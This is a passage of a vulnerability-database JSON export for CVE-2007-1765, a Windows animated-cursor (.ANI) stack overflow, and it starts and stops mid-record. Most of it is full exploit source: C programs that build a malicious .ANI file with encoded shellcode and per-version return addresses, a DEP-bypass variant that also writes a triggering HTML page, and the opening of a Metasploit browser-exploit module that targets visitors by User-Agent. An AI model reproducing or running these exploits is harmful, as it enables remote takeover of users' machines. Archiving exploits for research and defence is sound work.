=\n"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49"\n"\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x49\\x49\\x49\\x49\\x51\\x5a\\x6a\\x42"\n"\\x58\\x50\\x30\\x41\\x31\\x42\\x41\\x6b\\x41\\x41\\x52\\x32\\x41\\x42\\x41\\x32"\n"\\x42\\x41\\x30\\x42\\x41\\x58\\x50\\x38\\x41\\x42\\x75\\x38\\x69\\x79\\x6c\\x4a"\n"\\x48\\x67\\x34\\x47\\x70\\x77\\x70\\x53\\x30\\x6e\\x6b\\x67\\x35\\x45\\x6c\\x4c"\n"\\x4b\\x73\\x4c\\x74\\x45\\x31\\x68\\x54\\x41\\x68\\x6f\\x6c\\x4b\\x70\\x4f\\x57"\n"\\x68\\x6e\\x6b\\x71\\x4f\\x45\\x70\\x65\\x51\\x5a\\x4b\\x67\\x39\\x4c\\x4b\\x50"\n"\\x34\\x4c\\x4b\\x77\\x71\\x68\\x6e\\x75\\x61\\x4b\\x70\\x4e\\x79\\x6e\\x4c\\x4d"\n"\\x54\\x4b\\x70\\x72\\x54\\x65\\x57\\x69\\x51\\x49\\x5a\\x46\\x6d\\x37\\x71\\x6f"\n"\\x32\\x4a\\x4b\\x58\\x74\\x77\\x4b\\x41\\x44\\x44\\x64\\x35\\x54\\x72\\x55\\x7a"\n"\\x45\\x6c\\x4b\\x53\\x6f\\x51\\x34\\x37\\x71\\x48\\x6b\\x51\\x76\\x4c\\x4b\\x76"\n"\\x6c\\x50\\x4b\\x6e\\x6b\\x71\\x4f\\x67\\x6c\\x37\\x71\\x68\\x6b\\x4c\\x4b\\x65"\n"\\x4c\\x4c\\x4b\\x64\\x41\\x58\\x6b\\x4b\\x39\\x53\\x6c\\x75\\x74\\x46\\x64\\x78"\n"\\x43\\x74\\x71\\x49\\x50\\x30\\x64\\x6e\\x6b\\x43\\x70\\x44\\x70\\x4c\\x45\\x4f"\n"\\x30\\x41\\x68\\x44\\x4c\\x4e\\x6b\\x63\\x70\\x44\\x4c\\x6e\\x6b\\x30\\x70\\x65"\n"\\x4c\\x4e\\x4d\\x6c\\x4b\\x30\\x68\\x75\\x58\\x7a\\x4b\\x35\\x59\\x4c\\x4b\\x4d"\n"\\x50\\x58\\x30\\x37\\x70\\x47\\x70\\x77\\x70\\x6c\\x4b\\x65\\x38\\x57\\x4c\\x31"\n"\\x4f\\x66\\x51\\x48\\x76\\x65\\x30\\x70\\x56\\x4d\\x59\\x4a\\x58\\x6e\\x63\\x69"\n"\\x50\\x31\\x6b\\x76\\x30\\x55\\x38\\x5a\\x50\\x4e\\x6a\\x36\\x64\\x63\\x6f\\x61"\n"\\x78\\x6a\\x38\\x4b\\x4e\\x6c\\x4a\\x54\\x4e\\x76\\x37\\x6b\\x4f\\x4b\\x57\\x70"\n"\\x63\\x51\\x71\\x32\\x4c\\x52\\x43\\x37\\x70\\x42";\n\nchar szIntro[] =\n"\\n\\t\\tWindows .ANI LoadAniIcon Stack Overflow\\n"\n"\\t\\t\\tdevcode (c) 2007\\n"\n"[+] Targets:\\n"\n"\\t(1) Windows XP SP2\\n"\n"\\t(2) Kernel32.dll (ExitProcess)\\n"\n"\\t(3) Windows 2K SP4\\n\\n"\n"Usage: ani.exe <target> <file>";\n\ntypedef struct {\n\tconst char *szTarget;\n\tunsigned char uszRet[5];\n} TARGET;\n\nTARGET targets[] = {\n\t{ "Windows XP SP2", "\\xC9\\x29\\xD4\\x77" },\t\t\t\t/* call esp */\n\t{ "Kernel32.dll (ExitProcess)", "\\x90\\x90\\x90\\x90" },\t/* ExitProcess */\n\t{ "Windows 2K SP4", "\\x29\\x4C\\xE1\\x77" }\n};\n\nint main( int argc, char **argv ) {\n\tchar szBuffer[1024];\n\tFILE *f;\n\tvoid *pExitProcess[4];\n\n\tif ( argc < 3 ) {\n\t\tprintf("%s\\n", szIntro );\n\t\treturn 0;\n\t}\n\n\tif ( atoi( argv[1] ) == 1 ) {\n\t\tprintf("[+] Getting ExitProcess address...\\n");\n\t\t*pExitProcess = GetProcAddress( GetModuleHandle( "kernel32.dll" ), \n"ExitProcess" );\n\t\tif ( pExitProcess == NULL ) {\n\t\t\tprintf("[-] Cannot get ExitProcess address\\n");\n\t\t\treturn 0;\n\t\t}\n\t\tmemcpy( targets[1].uszRet, pExitProcess, 4 );\n\t}\n\n\tprintf("[+] Creating ANI header...\\n");\n\tmemset( szBuffer, 0x90, sizeof( szBuffer ) );\n\tmemcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );\n\n\tprintf("[+] Copying shellcode...\\n");\n\tmemcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 );\n\tmemcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1 );\n\n\tf = fopen( argv[2], "wb" );\n\tif ( f == NULL ) {\n\t\tprintf("[-] Cannot create file\\n");\n\t\treturn 0;\n\t}\n\n\tfwrite( szBuffer, 1, 1024, f );\n\tfclose( f );\n\tprintf("[+] .ANI file succesfully created!\\n");\n\treturn 0;\n}\n\n// sebug.net\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-14192", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "status": "poc"}, {"lastseen": "2017-11-19T22:10:03", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "No description provided by source.", "reporter": "Root", "published": "2007-04-02T00:00:00", "title": "MS Windows Animated Cursor (.ANI) Stack Overflow Exploit", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1765"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2007-04-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-6535", "id": "SSV:6535", "sourceData": "\n /*\r\n*\u00a0Copyright\u00a0(c)\u00a02007\u00a0devcode\r\n*\r\n*\r\n*\t\t\t^^\u00a0D\u00a0E\u00a0V\u00a0C\u00a0O\u00a0D\u00a0E\u00a0^^\r\n*\r\n*\u00a0Windows\u00a0.ANI\u00a0LoadAniIcon\u00a0Stack\u00a0Overflow\r\n*\u00a0[CVE-2007-1765]\r\n*\r\n*\r\n*\u00a0Description:\r\n*\u00a0\u00a0\u00a0\u00a0A\u00a0vulnerability\u00a0has\u00a0been\u00a0identified\u00a0in\u00a0Microsoft\u00a0Windows,\r\n*\t\u00a0\u00a0which\u00a0could\u00a0be\u00a0exploited\u00a0by\u00a0remote\u00a0attackers\u00a0to\u00a0take\u00a0complete\r\n*\t\u00a0\u00a0control\u00a0of\u00a0an\u00a0affected\u00a0system.\u00a0This\u00a0issue\u00a0is\u00a0due\u00a0to\u00a0a\u00a0stack\u00a0overflow\r\n*\u00a0\u00a0\u00a0\u00a0error\u00a0within\u00a0the\u00a0"LoadAniIcon()"\u00a0[user32.dll]\u00a0function\u00a0when\u00a0rendering\r\n*\u00a0\u00a0\u00a0\u00a0cursors,\u00a0animated\u00a0cursors\u00a0or\u00a0icons\u00a0with\u00a0a\u00a0malformed\u00a0header,\u00a0which\u00a0could\r\n*\t\u00a0\u00a0be\u00a0exploited\u00a0by\u00a0remote\u00a0attackers\u00a0to\u00a0execute\u00a0arbitrary\u00a0commands\u00a0by\r\n*\u00a0\u00a0\u00a0\u00a0tricking\u00a0a\u00a0user\u00a0into\u00a0visiting\u00a0a\u00a0malicious\u00a0web\u00a0page\u00a0or\u00a0viewing\u00a0an\u00a0email\r\n*\u00a0\u00a0\u00a0\u00a0message\u00a0containing\u00a0a\u00a0specially\u00a0crafted\u00a0ANI\u00a0file.\r\n*\r\n*\u00a0Hotfix/Patch:\r\n*\u00a0\u00a0\u00a0\u00a0None\u00a0as\u00a0of\u00a0this\u00a0time.\r\n*\r\n*\u00a0Vulnerable\u00a0systems:\r\n*\t\u00a0\u00a0Microsoft\u00a0Windows\u00a02000\u00a0Service\u00a0Pack\u00a04\r\n*\t\u00a0\u00a0Microsoft\u00a0Windows\u00a0XP\u00a0Service\u00a0Pack\u00a02\r\n*\t\u00a0\u00a0Microsoft\u00a0Windows\u00a0XP\u00a064-Bit\u00a0Edition\u00a0version\u00a02003\u00a0(Itanium)\r\n*\t\u00a0\u00a0Microsoft\u00a0Windows\u00a0XP\u00a0Professional\u00a0x64\u00a0Edition\r\n*\t\u00a0\u00a0Microsoft\u00a0Windows\u00a0Server\u00a02003\r\n*\t\u00a0\u00a0Microsoft\u00a0Windows\u00a0Server\u00a02003\u00a0(Itanium)\r\n*\t\u00a0\u00a0Microsoft\u00a0Windows\u00a0Server\u00a02003\u00a0Service\u00a0Pack\u00a01\r\n*\t\u00a0\u00a0Microsoft\u00a0Windows\u00a0Server\u00a02003\u00a0Service\u00a0Pack\u00a01\u00a0(Itanium)\r\n*\t\u00a0\u00a0Microsoft\u00a0Windows\u00a0Server\u00a02003\u00a0x64\u00a0Edition\r\n*\t\u00a0\u00a0Microsoft\u00a0Windows\u00a0Vista\r\n*\r\n*\t\u00a0\u00a0Microsoft\u00a0Internet\u00a0Explorer\u00a06\r\n*\t\u00a0\u00a0Microsoft\u00a0Internet\u00a0Explorer\u00a07\r\n*\r\n*\u00a0\u00a0\u00a0\u00a0This\u00a0is\u00a0a\u00a0PoC\u00a0and\u00a0was\u00a0created\u00a0for\u00a0educational\u00a0purposes\u00a0only.\u00a0The\r\n*\t\u00a0\u00a0author\u00a0is\u00a0not\u00a0held\u00a0responsible\u00a0if\u00a0this\u00a0PoC\u00a0does\u00a0not\u00a0work\u00a0or\u00a0is\r\n*\t\u00a0\u00a0used\u00a0for\u00a0any\u00a0other\u00a0purposes\u00a0than\u00a0the\u00a0one\u00a0stated\u00a0above.\r\n*\r\n*\u00a0Notes:\r\n*\t\u00a0\u00a0For\u00a0this\u00a0to\u00a0work\u00a0on\u00a0XP\u00a0SP2\u00a0on\u00a0explorer.exe,\u00a0DEP\u00a0has\u00a0to\u00a0be\u00a0turned\r\n*\t\u00a0\u00a0off.\r\n*\r\n*/\r\n#include\u00a0<iostream>\r\n#include\u00a0<windows.h>\r\n\r\n/*\u00a0ANI\u00a0Header\u00a0*/\r\nunsigned\u00a0char\u00a0uszAniHeader[]\u00a0=\r\n"\\x52\\x49\\x46\\x46\\x00\\x04\\x00\\x00\\x41\\x43\\x4F\\x4E\\x61\\x6E\\x69\\x68"\r\n"\\x24\\x00\\x00\\x00\\x24\\x00\\x00\\x00\\xFF\\xFF\\x00\\x00\\x0A\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x10\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x54\\x53\\x49\\x4C\\x03\\x00\\x00\\x00"\r\n"\\x10\\x00\\x00\\x00\\x54\\x53\\x49\\x4C\\x03\\x00\\x00\\x00\\x02\\x02\\x02\\x02"\r\n"\\x61\\x6E\\x69\\x68\\xA8\\x03\\x00\\x00";\r\n\r\n/*\u00a0Shellcode\u00a0-\u00a0metasploit\u00a0exec\u00a0calc.exe\u00a0^^\u00a0*/\r\nunsigned\u00a0char\u00a0uszShellcode[]\u00a0=\r\n"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49"\r\n"\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x49\\x49\\x49\\x49\\x51\\x5a\\x6a\\x42"\r\n"\\x58\\x50\\x30\\x41\\x31\\x42\\x41\\x6b\\x41\\x41\\x52\\x32\\x41\\x42\\x41\\x32"\r\n"\\x42\\x41\\x30\\x42\\x41\\x58\\x50\\x38\\x41\\x42\\x75\\x38\\x69\\x79\\x6c\\x4a"\r\n"\\x48\\x67\\x34\\x47\\x70\\x77\\x70\\x53\\x30\\x6e\\x6b\\x67\\x35\\x45\\x6c\\x4c"\r\n"\\x4b\\x73\\x4c\\x74\\x45\\x31\\x68\\x54\\x41\\x68\\x6f\\x6c\\x4b\\x70\\x4f\\x57"\r\n"\\x68\\x6e\\x6b\\x71\\x4f\\x45\\x70\\x65\\x51\\x5a\\x4b\\x67\\x39\\x4c\\x4b\\x50"\r\n"\\x34\\x4c\\x4b\\x77\\x71\\x68\\x6e\\x75\\x61\\x4b\\x70\\x4e\\x79\\x6e\\x4c\\x4d"\r\n"\\x54\\x4b\\x70\\x72\\x54\\x65\\x57\\x69\\x51\\x49\\x5a\\x46\\x6d\\x37\\x71\\x6f"\r\n"\\x32\\x4a\\x4b\\x58\\x74\\x77\\x4b\\x41\\x44\\x44\\x64\\x35\\x54\\x72\\x55\\x7a"\r\n"\\x45\\x6c\\x4b\\x53\\x6f\\x51\\x34\\x37\\x71\\x48\\x6b\\x51\\x76\\x4c\\x4b\\x76"\r\n"\\x6c\\x50\\x4b\\x6e\\x6b\\x71\\x4f\\x67\\x6c\\x37\\x71\\x68\\x6b\\x4c\\x4b\\x65"\r\n"\\x4c\\x4c\\x4b\\x64\\x41\\x58\\x6b\\x4b\\x39\\x53\\x6c\\x75\\x74\\x46\\x64\\x78"\r\n"\\x43\\x74\\x71\\x49\\x50\\x30\\x64\\x6e\\x6b\\x43\\x70\\x44\\x70\\x4c\\x45\\x4f"\r\n"\\x30\\x41\\x68\\x44\\x4c\\x4e\\x6b\\x63\\x70\\x44\\x4c\\x6e\\x6b\\x30\\x70\\x65"\r\n"\\x4c\\x4e\\x4d\\x6c\\x4b\\x30\\x68\\x75\\x58\\x7a\\x4b\\x35\\x59\\x4c\\x4b\\x4d"\r\n"\\x50\\x58\\x30\\x37\\x70\\x47\\x70\\x77\\x70\\x6c\\x4b\\x65\\x38\\x57\\x4c\\x31"\r\n"\\x4f\\x66\\x51\\x48\\x76\\x65\\x30\\x70\\x56\\x4d\\x59\\x4a\\x58\\x6e\\x63\\x69"\r\n"\\x50\\x31\\x6b\\x76\\x30\\x55\\x38\\x5a\\x50\\x4e\\x6a\\x36\\x64\\x63\\x6f\\x61"\r\n"\\x78\\x6a\\x38\\x4b\\x4e\\x6c\\x4a\\x54\\x4e\\x76\\x37\\x6b\\x4f\\x4b\\x57\\x70"\r\n"\\x63\\x51\\x71\\x32\\x4c\\x52\\x43\\x37\\x70\\x42";\r\n\r\nchar\u00a0szIntro[]\u00a0=\r\n"\\n\\t\\tWindows\u00a0.ANI\u00a0LoadAniIcon\u00a0Stack\u00a0Overflow\\n"\r\n"\\t\\t\\tdevcode\u00a0(c)\u00a02007\\n"\r\n"[+]\u00a0Targets:\\n"\r\n"\\t(1)\u00a0Windows\u00a0XP\u00a0SP2\\n"\r\n"\\t(2)\u00a0Kernel32.dll\u00a0(ExitProcess)\\n"\r\n"\\t(3)\u00a0Windows\u00a02K\u00a0SP4\\n\\n"\r\n"Usage:\u00a0ani.exe\u00a0<target>\u00a0<file>";\r\n\r\ntypedef\u00a0struct\u00a0{\r\n\tconst\u00a0char\u00a0*szTarget;\r\n\tunsigned\u00a0char\u00a0uszRet[5];\r\n}\u00a0TARGET;\r\n\r\nTARGET\u00a0targets[]\u00a0=\u00a0{\r\n\t{\u00a0"Windows\u00a0XP\u00a0SP2",\u00a0"\\xC9\\x29\\xD4\\x77"\u00a0},\t\t\t\t/*\u00a0call\u00a0esp\u00a0*/\r\n\t{\u00a0"Kernel32.dll\u00a0(ExitProcess)",\u00a0"\\x90\\x90\\x90\\x90"\u00a0},\t/*\u00a0ExitProcess\u00a0*/\r\n\t{\u00a0"Windows\u00a02K\u00a0SP4",\u00a0"\\x29\\x4C\\xE1\\x77"\u00a0}\r\n};\r\n\r\nint\u00a0main(\u00a0int\u00a0argc,\u00a0char\u00a0**argv\u00a0)\u00a0{\r\n\tchar\u00a0szBuffer[1024];\r\n\tFILE\u00a0*f;\r\n\tvoid\u00a0*pExitProcess[4];\r\n\r\n\tif\u00a0(\u00a0argc\u00a0<\u00a03\u00a0)\u00a0{\r\n\t\tprintf("%s\\n",\u00a0szIntro\u00a0);\r\n\t\treturn\u00a00;\r\n\t}\r\n\r\n\tif\u00a0(\u00a0atoi(\u00a0argv[1]\u00a0)\u00a0==\u00a01\u00a0)\u00a0{\r\n\t\tprintf("[+]\u00a0Getting\u00a0ExitProcess\u00a0address...\\n");\r\n\t\t*pExitProcess\u00a0=\u00a0GetProcAddress(\u00a0GetModuleHandle(\u00a0"kernel32.dll"\u00a0),\u00a0\r\n"ExitProcess"\u00a0);\r\n\t\tif\u00a0(\u00a0pExitProcess\u00a0==\u00a0NULL\u00a0)\u00a0{\r\n\t\t\tprintf("[-]\u00a0Cannot\u00a0get\u00a0ExitProcess\u00a0address\\n");\r\n\t\t\treturn\u00a00;\r\n\t\t}\r\n\t\tmemcpy(\u00a0targets[1].uszRet,\u00a0pExitProcess,\u00a04\u00a0);\r\n\t}\r\n\r\n\tprintf("[+]\u00a0Creating\u00a0ANI\u00a0header...\\n");\r\n\tmemset(\u00a0szBuffer,\u00a00x90,\u00a0sizeof(\u00a0szBuffer\u00a0)\u00a0);\r\n\tmemcpy(\u00a0szBuffer,\u00a0uszAniHeader,\u00a0sizeof(\u00a0uszAniHeader\u00a0)\u00a0-\u00a01\u00a0);\r\n\r\n\tprintf("[+]\u00a0Copying\u00a0shellcode...\\n");\r\n\tmemcpy(\u00a0szBuffer\u00a0+\u00a0168,\u00a0targets[atoi(\u00a0argv[1]\u00a0)].uszRet,\u00a04\u00a0);\r\n\tmemcpy(\u00a0szBuffer\u00a0+\u00a0192,\u00a0uszShellcode,\u00a0sizeof(\u00a0uszShellcode\u00a0)\u00a0-\u00a01\u00a0);\r\n\r\n\tf\u00a0=\u00a0fopen(\u00a0argv[2],\u00a0"wb"\u00a0);\r\n\tif\u00a0(\u00a0f\u00a0==\u00a0NULL\u00a0)\u00a0{\r\n\t\tprintf("[-]\u00a0Cannot\u00a0create\u00a0file\\n");\r\n\t\treturn\u00a00;\r\n\t}\r\n\r\n\tfwrite(\u00a0szBuffer,\u00a01,\u00a01024,\u00a0f\u00a0);\r\n\tfclose(\u00a0f\u00a0);\r\n\tprintf("[+]\u00a0.ANI\u00a0file\u00a0succesfully\u00a0created!\\n");\r\n\treturn\u00a00;\r\n}\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-6535", "status": "poc"}], "packetstorm": [{"lastseen": "2016-12-05T22:21:36", "references": [], "edition": 1, "description": "", "reporter": "devcode", "published": "2007-04-05T00:00:00", "type": "packetstorm", "title": "devcode2.txt", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1765"], "modified": "2007-04-05T00:00:00", "href": "https://packetstormsecurity.com/files/55661/devcode2.txt.html", "id": "PACKETSTORM:55661", "sourceData": "`/* \n* version 0.5 \n* Copyright (c) 2007 devcode \n* \n* \n* ^^ D E V C O D E ^^ \n* \n* Windows .ANI LoadAniIcon Stack Overflow For Hardware DEP XP SP2 \n* [CVE-2007-1765] \n* \n* \n* Description: \n* A vulnerability has been identified in Microsoft Windows, \n* which could be exploited by remote attackers to take complete \n* control of an affected system. This issue is due to a stack overflow \n* error within the \"LoadAniIcon()\" [user32.dll] function when rendering \n* cursors, animated cursors or icons with a malformed header, which could \n* be exploited by remote attackers to execute arbitrary commands by \n* tricking a user into visiting a malicious web page or viewing an email \n* message containing a specially crafted ANI file. \n* \n* Hotfix/Patch: \n* None as of this time. \n* \n* Vulnerable systems: \n* Microsoft Windows 2000 Service Pack 4 \n* Microsoft Windows XP Service Pack 2 \n* Microsoft Windows XP 64-Bit Edition version 2003 (Itanium) \n* Microsoft Windows XP Professional x64 Edition \n* Microsoft Windows Server 2003 \n* Microsoft Windows Server 2003 (Itanium) \n* Microsoft Windows Server 2003 Service Pack 1 \n* Microsoft Windows Server 2003 Service Pack 1 (Itanium) \n* Microsoft Windows Server 2003 x64 Edition \n* Microsoft Windows Vista \n* \n* Microsoft Internet Explorer 6 \n* Microsoft Internet Explorer 7 \n* \n* Tested on: \n* Microsoft XP SP2 + DEP + Internet Explorer 6 \n* \n* This is a PoC and was created for educational purposes only. The \n* author is not held responsible if this PoC does not work or is \n* used for any other purposes than the one stated above. \n* \n* Credit goes to HOD (if he/they exist :P) for the html. Works on \n* XP SP2 with Hardware DEP enabled, go figure. \n* \n* ^^ shoutz to Wonk(if he exists r0fl), InTeL, thrasher :) \n* \n* \n*/ \n#include <iostream> \n#include <windows.h> \n \n/* ANI Header */ \nunsigned char uszAniHeader[] = \n\"\\x52\\x49\\x46\\x46\\x00\\x04\\x00\\x00\\x41\\x43\\x4F\\x4E\\x61\\x6E\\x69\\x68\" \n\"\\x24\\x00\\x00\\x00\\x24\\x00\\x00\\x00\\xFF\\xFF\\x00\\x00\\x0A\\x00\\x00\\x00\" \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \n\"\\x10\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x54\\x53\\x49\\x4C\\x03\\x00\\x00\\x00\" \n\"\\x10\\x00\\x00\\x00\\x54\\x53\\x49\\x4C\\x03\\x00\\x00\\x00\\x02\\x02\\x02\\x02\" \n\"\\x61\\x6E\\x69\\x68\\xA8\\x03\\x00\\x00\"; \n \n/* system(\"calc.exe\"); */ \nchar szExecute[] = \"logoff.exe\\x00\"; \n \nunsigned char uszHtml[] = \n\"<html>\" \n\"Microsoft Windows .ANI LoadAniIcon Exploit\" \n\"<br>Copyright (c) 2007 devcode<br>\" \n\"<style>\" \\ \n\"* {CURSOR: url(\\\"poc.ani\\\")}</style></head>\" \n\"</html>\"; \n \n/* Usage: ani.exe 1*/ \nchar szIntro[] = \n\"\\n\\t\\tWindows .ANI LoadAniIcon Stack Overflow\\n\" \n\"\\t\\t\\tdevcode (c) 2007\\n\" \n\"[+] Targets:\\n\" \n\"\\t(0) Kernel32.dll (ExitProcess)\\n\" \n\"\\t(1) Windows XP SP2 + DEP\\n\" \n\"\\t(2) Windows 2003 Server\\n\" \n\"Usage: ani.exe <target>\"; \n \n/* RET2LIBC attack */ \ntypedef struct { \nconst char *szTarget; \n/* kernel32.dll - set the proper stack frame \nLEA EBP, DWORD PTR SS:[ESP+10] \nSUB ESP, EAX \nPUSH EBX \nPUSH ESI \nPUSH EDI \n.... \n.... \nRETN \n*/ \nunsigned char uszRet[5]; \n/* msvcrt.dll - system() */ \nunsigned char uszMsvcrtCall[5]; \n} TARGET; \n \nTARGET targets[] = { \n{ \"Kernel32.dll (ExitProcess)\", \"\\x90\\x90\\x90\\x90\", \"\\x90\\x90\\x90\\x90\" }, \n{ \"Windows XP SP2\", \"\\xD6\\x24\\x80\\x7C\", \"\\xC7\\x93\\xC2\\x77\" }, \n{ \"Windows 2003 Server\", \"\\x0A\\x17\\xE4\\x77\", \"\\x10\\x8C\\xBB\\x77\" } \n}; \n \nint main( int argc, char **argv ) { \nchar szBuffer[1024]; \nFILE *f; \nvoid *pExitProcess[4]; \n \nif ( argc < 2 ) { \nprintf(\"%s\\n\", szIntro ); \nreturn 0; \n} \n \nif ( atoi( argv[1] ) == 0 ) { \nprintf(\"[+] Getting ExitProcess address...\\n\"); \n*pExitProcess = GetProcAddress( GetModuleHandle( \"kernel32.dll\" ), \n\"ExitProcess\" ); \nif ( pExitProcess == NULL ) { \nprintf(\"[-] Cannot get ExitProcess address\\n\"); \nreturn 0; \n} \nmemcpy( targets[1].uszRet, pExitProcess, 4 ); \n} \n \nprintf(\"[+] Creating ANI header...\\n\"); \nmemset( szBuffer, 0x90, sizeof( szBuffer ) ); \nmemcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 ); \n \nprintf(\"[+] Copying execution code...\\n\"); \nmemcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 ); \nmemset( szBuffer + 136, 0, 4 ); \nmemset( szBuffer + 204, 0, 4 ); \nszBuffer[136] = 0x6C; \nszBuffer[204] = 0x6C; \nmemcpy( szBuffer + 196, targets[atoi(argv[1])].uszMsvcrtCall, 4 ); \nmemcpy( szBuffer + 200, targets[atoi(argv[1])].uszMsvcrtCall, 4 ); \nmemcpy( szBuffer + 240, szExecute, sizeof( szExecute ) - 1 ); \n \nf = fopen( \"poc.ani\", \"wb\" ); \nif ( f == NULL ) { \nprintf(\"[-] Cannot create ani file\\n\"); \nreturn 0; \n} \n \nfwrite( szBuffer, 1, 1024, f ); \nfclose( f ); \nprintf(\"[+] .ANI file succesfully created!\\n\"); \n \nf = fopen( \"poc.html\", \"wb\" ); \nif ( f == NULL ) { \nprintf(\"[-] Cannot create html file\\n\"); \nreturn 0; \n} \n \nfwrite( uszHtml, 1, sizeof( uszHtml ), f ); \nfclose( f ); \nprintf(\"[+] HTML file succesfully created!\\n\"); \n \nreturn 0; \n} \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/55661/devcode2.txt"}, {"lastseen": "2016-12-05T22:23:32", "references": [], "edition": 1, "description": "", "reporter": "Matt Miller", "published": "2007-04-03T00:00:00", "type": "packetstorm", "title": "ani_loadimage_chunksize-browser.rb.txt", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "modified": "2007-04-03T00:00:00", "href": "https://packetstormsecurity.com/files/55551/ani_loadimage_chunksize-browser.rb.txt.html", "id": "PACKETSTORM:55551", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/projects/Framework/ \n## \n \n \nrequire 'msf/core' \n \nmodule Msf \n \nclass Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote \n \n# \n# This module acts as an HTTP server \n# \ninclude Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP)', \n'Description' => %q{ \nThis module exploits a buffer overflow vulnerability in the \nLoadAniIcon() function of USER32.dll. The flaw is triggered \nthrough Internet Explorer (6 and 7) by using the CURSOR style sheet \ndirective to load a malicious .ANI file. Internet Explorer will catch any \nexceptions that occur while the invalid cursor is loaded, causing the \nexploit to silently fail when the wrong target has been chosen. This \nmodule will be updated in the near future to perform client-side \nfingerprinting and brute forcing. \n \nThis vulnerability was discovered by Alexander Sotirov of Determina \nand was rediscovered, in the wild, by McAfee. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'hdm', # First version \n'skape', # Vista support \n], \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2007-0038'], \n['CVE', '2007-1765'], \n['BID', '23194'], \n['URL', 'http://www.microsoft.com/technet/security/advisory/935423.mspx'], \n['URL', 'http://www.determina.com/security_center/security_advisories/securityadvisory_0day_032907.asp'], \n['URL', 'http://www.determina.com/security.research/vulnerabilities/ani-header.html'], \n], \n'DefaultOptions' => \n{ \n# Cause internet explorer to exit after the code hits \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 1024 + (rand(1000)), \n'MinNops' => 32, \n'Compat' => \n{ \n'ConnectionType' => '-find', \n}, \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# \n# Use multiple cursor URLs to try all targets for a particular \n# operating system. This can result in multiple, sequential sessions \n# \n \n[ 'Automatic', { }], \n \n# \n# The following targets use call [ebx+4], just like the original exploit \n# \n \n# Partial overwrite for cross-language exploitation (latest user32 only) \n[ 'Windows XP SP2 user32.dll 5.1.2600.2622', { 'Ret' => 0x25ba, 'Len' => 2 }], \n \n# Should work for all English XP SP2 \n[ 'Windows XP SP2 userenv.dll English', { 'Ret' => 0x769fc81a }], \n \n# Should work for English XP SP0/SP1 \n[ 'Windows XP SP0/SP1 netui2.dll English', { 'Ret' => 0x71bd0205 }], \n \n# Should work for English 2000 SP0-SP4+ \n[ 'Windows 2000 SP0-SP4 netui2.dll English', { 'Ret' => 0x75116d88 }], \n \n \n# \n# Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start \n# of the RIFF chunk itself. The length field of the RIFF chunk \n# tag contains a short jump into an embedded riff chunk that \n# makes a long relative jump into the actual payload. \n# \n[ 'Windows Vista user32.dll 6.0.6000.16386', { 'Ret' => 0x700b, 'Len' => 2 } ] \n \n], \n'DisclosureDate' => 'Mar 28 2007', \n'DefaultTarget' => 0)) \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef on_request_uri(cli, request) \n \nmytarget = self.target \nros = /.*/ \n \ncase request.headers['User-Agent'] \n \nwhen /Windows (NT |)4\\.0/ \nros = /NT 4/ \n \nwhen /Windows (NT |)5\\.0/ \nros = /2000/ \n \nwhen /Windows (NT |)5\\.1/ \nros = /XP/ \n \nwhen /Windows (NT |)5\\.2/ \nros = /2003/ \n \nwhen /Windows (NT |)6\\.0/ \nros = /Vista/ \nend \n \n \ntarg = nil \nexts = ['bmp', 'wav', 'png', 'zip', 'tar'] \ngext = exts[rand(exts.length)] \n \nruri, qstr = request.uri.split('?') \n \nif (qstr and qstr =~ 